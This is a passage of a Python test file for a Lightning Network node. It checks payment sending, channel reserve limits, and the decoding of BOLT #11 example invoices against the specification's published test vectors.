return (
only_one(p1['channels'])['msatoshi_to_us'] == 10**6 * 1000 - amt
and only_one(p1['channels'])['msatoshi_total'] == 10**6 * 1000
and only_one(p2['channels'])['msatoshi_to_us'] == amt
and only_one(p2['channels'])['msatoshi_total'] == 10**6 * 1000
)
wait_for(check_balances)
# Repeat will "succeed", but won't actually send anything (duplicate)
assert not l1.daemon.is_in_log('Payment 0/1: .* COMPLETE')
details = l1.rpc.sendpay([routestep], rhash)
assert details['status'] == "complete"
preimage2 = details['payment_preimage']
assert preimage == preimage2
l1.daemon.wait_for_log('Payment 0/1: .* COMPLETE')
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['status'] == 'paid'
assert only_one(l2.rpc.listinvoices('testpayment2')['invoices'])['msatoshi_received'] == rs['msatoshi']
# Overpaying by "only" a factor of 2 succeeds.
rhash = l2.rpc.invoice(amt, 'testpayment3', 'desc')['payment_hash']
assert only_one(l2.rpc.listinvoices('testpayment3')['invoices'])['status'] == 'unpaid'
routestep = {'msatoshi': amt * 2, 'id': l2.info['id'], 'delay': 5, 'channel': '1x1x1'}
l1.rpc.sendpay([routestep], rhash)
preimage3 = l1.rpc.waitsendpay(rhash)['payment_preimage']
assert only_one(l2.rpc.listinvoices('testpayment3')['invoices'])['status'] == 'paid'
assert only_one(l2.rpc.listinvoices('testpayment3')['invoices'])['msatoshi_received'] == amt * 2
# Test listsendpays
payments = l1.rpc.listsendpays()['payments']
assert len(payments) == 2
invoice2 = only_one(l2.rpc.listinvoices('testpayment2')['invoices'])
payments = l1.rpc.listsendpays(payment_hash=invoice2['payment_hash'])['payments']
assert len(payments) == 1
assert payments[0]['status'] == 'complete'
assert payments[0]['payment_preimage'] == preimage2
invoice3 = only_one(l2.rpc.listinvoices('testpayment3')['invoices'])
payments = l1.rpc.listsendpays(payment_hash=invoice3['payment_hash'])['payments']
assert len(payments) == 1
assert payments[0]['status'] == 'complete'
assert payments[0]['payment_preimage'] == preimage3
@unittest.skipIf(TEST_NETWORK != 'regtest', "The reserve computation is bitcoin specific")
def test_sendpay_cant_afford(node_factory):
# Set feerates the same so we don't have to wait for update.
l1, l2 = node_factory.line_graph(2, fundamount=10**6,
opts={'feerates': (15000, 15000, 15000, 15000)})
# Can't pay more than channel capacity.
with pytest.raises(RpcError):
l1.pay(l2, 10**9 + 1)
# Reserve is 1%.
reserve = 10**7
# # This is how we recalc constants (v. v. slow!)
# minimum = 1
# maximum = 10**9
# while maximum - minimum > 1:
# l1, l2 = node_factory.line_graph(2, fundamount=10**6,
# opts={'feerates': (15000, 15000, 15000, 15000)})
# try:
# l1.pay(l2, (minimum + maximum) // 2)
# minimum = (minimum + maximum) // 2
# except RpcError:
# maximum = (minimum + maximum) // 2
# print("{} - {}".format(minimum, maximum))
# assert False
# This is the fee, which needs to be taken into account for l1.
if EXPERIMENTAL_FEATURES:
# option_anchor_outputs
available = 10**9 - 44700000
else:
available = 10**9 - 32040000
# Can't pay past reserve.
with pytest.raises(RpcError):
l1.pay(l2, available)
with pytest.raises(RpcError):
l1.pay(l2, available - reserve + 1)
# Can pay up to reserve (1%)
l1.pay(l2, available - reserve)
# And now it can't pay back, due to its own reserve.
with pytest.raises(RpcError):
l2.pay(l1, available - reserve)
# But this should work.
l2.pay(l1, available - reserve * 2)
def test_decodepay(node_factory):
l1 = node_factory.get_node()
# BOLT #11:
# > ### Please make a donation of any amount using payment_hash 0001020304050607080900010203040506070809000102030405060708090102 to me @03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad
# > lnbc1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdpl2pkx2ctnv5sxxmmwwd5kgetjypeh2ursdae8g6twvus8g6rfwvs8qun0dfjkxaq8rkx3yf5tcsyz3d73gafnh3cax9rn449d9p5uxz9ezhhypd0elx87sjle52x86fux2ypatgddc6k63n7erqz25le42c4u4ecky03ylcqca784w
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash
# * `p5`: `data_length` (`p` = 1, `5` = 20. 1 * 32 + 20 == 52)
# * `qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypq`: payment hash 0001020304050607080900010203040506070809000102030405060708090102
# * `d`: short description
# * `pl`: `data_length` (`p` = 1, `l` = 31. 1 * 32 + 31 == 63)
# * `2pkx2ctnv5sxxmmwwd5kgetjypeh2ursdae8g6twvus8g6rfwvs8qun0dfjkxaq`: 'Please consider supporting this project'
# * `32vjcgqxyuj7nqphl3xmmhls2rkl3t97uan4j0xa87gj5779czc8p0z58zf5wpt9ggem6adl64cvawcxlef9djqwp2jzzfvs272504sp`: signature
# * `0lkg3c`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lnbc1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqd'
'pl2pkx2ctnv5sxxmmwwd5kgetjypeh2ursdae8g6twvus8g6rfwvs8qun0dfjkxaq8rk'
'x3yf5tcsyz3d73gafnh3cax9rn449d9p5uxz9ezhhypd0elx87sjle52x86fux2ypatg'
'ddc6k63n7erqz25le42c4u4ecky03ylcqca784w'
)
assert b11['currency'] == 'bc'
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['description'] == 'Please consider supporting this project'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
# BOLT #11:
# > ### Please send $3 for a cup of coffee to the same peer, within 1 minute
# > lnbc2500u1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5xysxxatsyp3k7enxv4jsxqzpuaztrnwngzn3kdzw5hydlzf03qdgm2hdq27cqv3agm2awhz5se903vruatfhq77w3ls4evs3ch9zw97j25emudupq63nyw24cg27h2rspfj9srp
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `2500u`: amount (2500 micro-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `d`: short description
# * `q5`: `data_length` (`q` = 0, `5` = 20. 0 * 32 + 20 == 20)
# * `xysxxatsyp3k7enxv4js`: '1 cup coffee'
# * `x`: expiry time
# * `qz`: `data_length` (`q` = 0, `z` = 2. 0 * 32 + 2 == 2)
# * `pu`: 60 seconds (`p` = 1, `u` = 28. 1 * 32 + 28 == 60)
# * `azh8qt5w7qeewkmxtv55khqxvdfs9zzradsvj7rcej9knpzdwjykcq8gv4v2dl705pjadhpsc967zhzdpuwn5qzjm0s4hqm2u0vuhhqq`: signature
# * `7vc09u`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lnbc2500u1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqf'
'qypqdq5xysxxatsyp3k7enxv4jsxqzpuaztrnwngzn3kdzw5hydlzf03qdgm2hdq27cq'
'v3agm2awhz5se903vruatfhq77w3ls4evs3ch9zw97j25emudupq63nyw24cg27h2rsp'
'fj9srp'
)
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 2500 * 10**11 // 1000000
assert b11['amount_msat'] == Millisatoshi(2500 * 10**11 // 1000000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['description'] == '1 cup coffee'
assert b11['expiry'] == 60
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
# BOLT #11:
# > ### Now send $24 for an entire list of things (hashed)
# > lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqscc6gd6ql3jrc5yzme8v4ntcewwz5cnw92tz0pc8qcuufvq7khhr8wpald05e92xw006sq94mg8v2ndf4sefvf9sygkshp5zfem29trqq2yxxz7
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `h`: tagged field: hash of description
# * `p5`: `data_length` (`p` = 1, `5` = 20. 1 * 32 + 20 == 52)
# * `8yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqs`: SHA256 of 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon'
# * `vjfls3ljx9e93jkw0kw40yxn4pevgzflf83qh2852esjddv4xk4z70nehrdcxa4fk0t6hlcc6vrxywke6njenk7yzkzw0quqcwxphkcp`: signature
# * `vam37w`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqy'
'pqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqscc6gd6ql3jr'
'c5yzme8v4ntcewwz5cnw92tz0pc8qcuufvq7khhr8wpald05e92xw006sq94mg8v2ndf'
'4sefvf9sygkshp5zfem29trqq2yxxz7',
'One piece of chocolate cake, one icecream cone, one pickle, one slic'
'e of swiss cheese, one slice of salami, one lollypop, one piece of c'
'herry pie, one sausage, one cupcake, and one slice of watermelon'
)
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(str(20 * 10**11 // 1000) + 'msat')
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
# > ### The same, on testnet, with a fallback address mk2QpYatsKicvFVuTAQLBryyccRXMUaGHP
# > lntb20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfpp3x9et2e20v6pu37c5d9vax37wxq72un98kmzzhznpurw9sgl2v0nklu2g4d0keph5t7tj9tcqd8rexnd07ux4uv2cjvcqwaxgj7v4uwn5wmypjd5n69z2xm3xgksg28nwht7f6zspwp3f9t
#
# Breakdown:
#
# * `lntb`: prefix, lightning on bitcoin testnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `3x9et2e20v6pu37c5d9vax37wxq72un98`: `3` = 17, so P2PKH address
# * `h`: tagged field: hash of description...
# * `qh84fmvn2klvglsjxfy0vq2mz6t9kjfzlxfwgljj35w2kwa60qv49k7jlsgx43yhs9nuutllkhhnt090mmenuhp8ue33pv4klmrzlcqp`: signature
# * `us2s2r`: Bech32 checksum
b11 = l1.rpc.decodepay(
'lntb20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahr'
'qspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfpp3x9et2e2'
'0v6pu37c5d9vax37wxq72un98kmzzhznpurw9sgl2v0nklu2g4d0keph5t7tj9tcqd8r'
'exnd07ux4uv2cjvcqwaxgj7v4uwn5wmypjd5n69z2xm3xgksg28nwht7f6zspwp3f9t',
'One piece of chocolate cake, one icecream cone, one pickle, one slic'
'e of swiss cheese, one slice of salami, one lollypop, one piece of c'
'herry pie, one sausage, one cupcake, and one slice of watermelon'
)
assert b11['currency'] == 'tb'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2PKH'
assert b11['fallbacks'][0]['addr'] == 'mk2QpYatsKicvFVuTAQLBryyccRXMUaGHP'
# > ### On mainnet, with fallback address 1RustyRX2oai4EYYDpQGWvEL62BBGqN9T with extra routing info to go via nodes 029e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255 then 039e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255
# > lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqsfpp3qjmp7lwpagxun9pygexvgpjdc4jdj85fr9yq20q82gphp2nflc7jtzrcazrra7wwgzxqc8u7754cdlpfrmccae92qgzqvzq2ps8pqqqqqqpqqqqq9qqqvpeuqafqxu92d8lr6fvg0r5gv0heeeqgcrqlnm6jhphu9y00rrhy4grqszsvpcgpy9qqqqqqgqqqqq7qqzqj9n4evl6mr5aj9f58zp6fyjzup6ywn3x6sk8akg5v4tgn2q8g4fhx05wf6juaxu9760yp46454gpg5mtzgerlzezqcqvjnhjh8z3g2qqdhhwkj
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `h`: tagged field: hash of description...
# * `f`: tagged field: fallback address
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `3` = 17, so P2PKH address
# * `qjmp7lwpagxun9pygexvgpjdc4jdj85f`: 160 bit P2PKH address
# * `r`: tagged field: route information
# * `9y`: `data_length` (`9` = 5, `y` = 4. 5 * 32 + 4 = 164)
# `q20q82gphp2nflc7jtzrcazrra7wwgzxqc8u7754cdlpfrmccae92qgzqvzq2ps8pqqqqqqqqqqqq9qqqvpeuqafqxu92d8lr6fvg0r5gv0heeeqgcrqlnm6jhphu9y00rrhy4grqszsvpcgpy9qqqqqqqqqqqq7qqzq`: pubkey `029e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255`, `short_channel_id` 0102030405060708, `fee_base_msat` 1 millisatoshi, `fee_proportional_millionths` 20, `cltv_expiry_delta` 3. pubkey `039e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255`, `short_channel_id` 030405060708090a, `fee_base_msat` 2 millisatoshi, `fee_proportional_millionths` 30, `cltv_expiry_delta` 4.
# * `j9n4evl6mr5aj9f58zp6fyjzup6ywn3x6sk8akg5v4tgn2q8g4fhx05wf6juaxu9760yp46454gpg5mtzgerlzezqcqvjnhjh8z3g2qq`: signature
# * `dhhwkj`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqsfpp3qjmp7lwpagxun9pygexvgpjdc4jdj85fr9yq20q82gphp2nflc7jtzrcazrra7wwgzxqc8u7754cdlpfrmccae92qgzqvzq2ps8pqqqqqqpqqqqq9qqqvpeuqafqxu92d8lr6fvg0r5gv0heeeqgcrqlnm6jhphu9y00rrhy4grqszsvpcgpy9qqqqqqgqqqqq7qqzqj9n4evl6mr5aj9f58zp6fyjzup6ywn3x6sk8akg5v4tgn2q8g4fhx05wf6juaxu9760yp46454gpg5mtzgerlzezqcqvjnhjh8z3g2qqdhhwkj', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2PKH'
assert b11['fallbacks'][0]['addr'] == '1RustyRX2oai4EYYDpQGWvEL62BBGqN9T'
assert len(b11['routes']) == 1
assert len(b11['routes'][0]) == 2
assert b11['routes'][0][0]['pubkey'] == '029e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255'
# 0x010203:0x040506:0x0708
assert b11['routes'][0][0]['short_channel_id'] == '66051x263430x1800'
assert b11['routes'][0][0]['fee_base_msat'] == 1
assert b11['routes'][0][0]['fee_proportional_millionths'] == 20
assert b11['routes'][0][0]['cltv_expiry_delta'] == 3
assert b11['routes'][0][1]['pubkey'] == '039e03a901b85534ff1e92c43c74431f7ce72046060fcf7a95c37e148f78c77255'
# 0x030405:0x060708:0x090a
assert b11['routes'][0][1]['short_channel_id'] == '197637x395016x2314'
assert b11['routes'][0][1]['fee_base_msat'] == 2
assert b11['routes'][0][1]['fee_proportional_millionths'] == 30
assert b11['routes'][0][1]['cltv_expiry_delta'] == 4
# > ### On mainnet, with fallback (P2SH) address 3EktnHQD7RiAE6uzMj2ZifT9YgRrkSgzQX
# > lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppj3a24vwu6r8ejrss3axul8rxldph2q7z9kmrgvr7xlaqm47apw3d48zm203kzcq357a4ls9al2ea73r8jcceyjtya6fu5wzzpe50zrge6ulk4nvjcpxlekvmxl6qcs9j3tz0469gq5g658y
#
# Breakdown:
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address.
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `j3a24vwu6r8ejrss3axul8rxldph2q7z9`: `j` = 18, so P2SH address
# * `h`: tagged field: hash of description...
# * `2jhz8j78lv2jynuzmz6g8ve53he7pheeype33zlja5azae957585uu7x59w0f2l3rugyva6zpu394y4rh093j6wxze0ldsvk757a9msq`: signature
# * `mf9swh`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppj3a24vwu6r8ejrss3axul8rxldph2q7z9kmrgvr7xlaqm47apw3d48zm203kzcq357a4ls9al2ea73r8jcceyjtya6fu5wzzpe50zrge6ulk4nvjcpxlekvmxl6qcs9j3tz0469gq5g658y', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2SH'
assert b11['fallbacks'][0]['addr'] == '3EktnHQD7RiAE6uzMj2ZifT9YgRrkSgzQX'
# > ### On mainnet, with fallback (P2WPKH) address bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4
# > lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppqw508d6qejxtdg4y5r3zarvary0c5xw7kepvrhrm9s57hejg0p662ur5j5cr03890fa7k2pypgttmh4897d3raaq85a293e9jpuqwl0rnfuwzam7yr8e690nd2ypcq9hlkdwdvycqa0qza8
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address.
# * `pp`: `data_length` (`p` = 1. 1 * 32 + 1 == 33)
# * `q`: 0, so witness version 0.
# * `qw508d6qejxtdg4y5r3zarvary0c5xw7k`: 160 bits = P2WPKH.
# * `h`: tagged field: hash of description...
# * `gw6tk8z0p0qdy9ulggx65lvfsg3nxxhqjxuf2fvmkhl9f4jc74gy44d5ua9us509prqz3e7vjxrftn3jnk7nrglvahxf7arye5llphgq`: signature
# * `qdtpa4`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfppqw508d6qejxtdg4y5r3zarvary0c5xw7kepvrhrm9s57hejg0p662ur5j5cr03890fa7k2pypgttmh4897d3raaq85a293e9jpuqwl0rnfuwzam7yr8e690nd2ypcq9hlkdwdvycqa0qza8', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2WPKH'
assert b11['fallbacks'][0]['addr'] == 'bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4'
# > ### On mainnet, with fallback (P2WSH) address bc1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qccfmv3
# > lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfp4qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3q28j0v3rwgy9pvjnd48ee2pl8xrpxysd5g44td63g6xcjcu003j3qe8878hluqlvl3km8rm92f5stamd3jw763n3hck0ct7p8wwj463cql26ava
#
# * `lnbc`: prefix, lightning on bitcoin mainnet
# * `20m`: amount (20 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `f`: tagged field: fallback address.
# * `p4`: `data_length` (`p` = 1, `4` = 21. 1 * 32 + 21 == 53)
# * `q`: 0, so witness version 0.
# * `rp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3q`: 260 bits = P2WSH.
# * `h`: tagged field: hash of description...
# * `5yps56lmsvgcrf476flet6js02m93kgasews8q3jhtp7d6cqckmh70650maq4u65tk53ypszy77v9ng9h2z3q3eqhtc3ewgmmv2grasp`: signature
# * `akvd7y`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc20m1pvjluezhp58yjmdan79s6qqdhdzgynm4zwqd5d7xmw5fk98klysy043l2ahrqspp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqfp4qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3q28j0v3rwgy9pvjnd48ee2pl8xrpxysd5g44td63g6xcjcu003j3qe8878hluqlvl3km8rm92f5stamd3jw763n3hck0ct7p8wwj463cql26ava', 'One piece of chocolate cake, one icecream cone, one pickle, one slice of swiss cheese, one slice of salami, one lollypop, one piece of cherry pie, one sausage, one cupcake, and one slice of watermelon')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 20 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(20 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert len(b11['fallbacks']) == 1
assert b11['fallbacks'][0]['type'] == 'P2WSH'
assert b11['fallbacks'][0]['addr'] == 'bc1qrp33g0q5c5txsp9arysrx4k6zdkfs4nce4xj0gdcccefvpysxf3qccfmv3'
# > ### Please send $30 for coffee beans to the same peer, which supports features 1 and 9
# > lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9qzsze992adudgku8p05pstl6zh7av6rx2f297pv89gu5q93a0hf3g7lynl3xq56t23dpvah6u7y9qey9lccrdml3gaqwc6nxsl5ktzm464sq73t7cl
#
# Breakdown:
#
# * `lnbc`: prefix, Lightning on Bitcoin mainnet
# * `25m`: amount (25 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `d`: short description
# * `q5`: `data_length` (`q` = 0, `5` = 20; 0 * 32 + 20 == 20)
# * `vdhkven9v5sxyetpdees`: 'coffee beans'
# * `9`: features
# * `qz`: `data_length` (`q` = 0, `z` = 2; 0 * 32 + 2 == 2)
# * `sz`: b1000000010
# * `e992adudgku8p05pstl6zh7av6rx2f297pv89gu5q93a0hf3g7lynl3xq56t23dpvah6u7y9qey9lccrdml3gaqwc6nxsl5ktzm464sq`: signature
# * `73t7cl`: Bech32 checksum
b11 = l1.rpc.decodepay('lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9qzsze992adudgku8p05pstl6zh7av6rx2f297pv89gu5q93a0hf3g7lynl3xq56t23dpvah6u7y9qey9lccrdml3gaqwc6nxsl5ktzm464sq73t7cl')
assert b11['currency'] == 'bc'
assert b11['msatoshi'] == 25 * 10**11 // 1000
assert b11['amount_msat'] == Millisatoshi(25 * 10**11 // 1000)
assert b11['created_at'] == 1496314658
assert b11['payment_hash'] == '0001020304050607080900010203040506070809000102030405060708090102'
assert b11['description'] == 'coffee beans'
assert b11['expiry'] == 3600
assert b11['payee'] == '03e7156ae33b0a208d0744199163177e909e80176e55d97a2f221ede0f934dd9ad'
assert b11['features'] == '0202'
# > # Same, but using invalid unknown feature 100
# > lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9q4pqqqqqqqqqqqqqqqqqqszk3ed62snp73037h4py4gry05eltlp0uezm2w9ajnerhmxzhzhsu40g9mgyx5v3ad4aqwkmvyftzk4k9zenz90mhjcy9hcevc7r3lx2sphzfxz7
#
# Breakdown:
#
# * `lnbc`: prefix, Lightning on Bitcoin mainnet
# * `25m`: amount (25 milli-bitcoin)
# * `1`: Bech32 separator
# * `pvjluez`: timestamp (1496314658)
# * `p`: payment hash...
# * `d`: short description
# * `q5`: `data_length` (`q` = 0, `5` = 20; 0 * 32 + 20 == 20)
# * `vdhkven9v5sxyetpdees`: 'coffee beans'
# * `9`: features
# * `q4`: `data_length` (`q` = 0, `4` = 21; 0 * 32 + 21 == 21)
# * `pqqqqqqqqqqqqqqqqqqsz`: b00001...(90 zeroes)...1000000010
# * `k3ed62snp73037h4py4gry05eltlp0uezm2w9ajnerhmxzhzhsu40g9mgyx5v3ad4aqwkmvyftzk4k9zenz90mhjcy9hcevc7r3lx2sp`: signature
# * `hzfxz7`: Bech32 checksum
with pytest.raises(RpcError, match='unknown feature.*100'):
l1.rpc.decodepay('lnbc25m1pvjluezpp5qqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqqqsyqcyq5rqwzqfqypqdq5vdhkven9v5sxyetpdees9q4pqqqqqqqqqqqqqqqqqqszk3ed62snp73037h4py4gry05eltlp0uezm2w9ajnerhmxzhzhsu40g9mgyx5v3ad4aqwkmvyftzk4k9zenz90mhjcy9hcevc7r3lx2sphzfxz7')
# Example of an invoice without a multiplier suffix to the amount. This
# should then be interpreted as 7 BTC according to the spec:
#
# `amount`: optional number in that currency, followed by an optional
# `multiplier` letter. The unit encoded here is the 'social' convention of
# a payment unit -- in the case of Bitcoin the unit is 'bitcoin' NOT
# satoshis.
b11 = "lnbcrt71p0g4u8upp5xn4k45tsp05akmn65s5k2063d5fyadhjse9770xz5sk7u4x6vcmqdqqcqzynxqrrssx94cf4p727jamncsvcd8m99n88k423ruzq4dxwevfatpp5gx2mksj2swshjlx4pe3j5w9yed5xjktrktzd3nc2a04kq8yu84l7twhwgpxjn3pw"
b11 = l1.rpc.decodepay(b11)
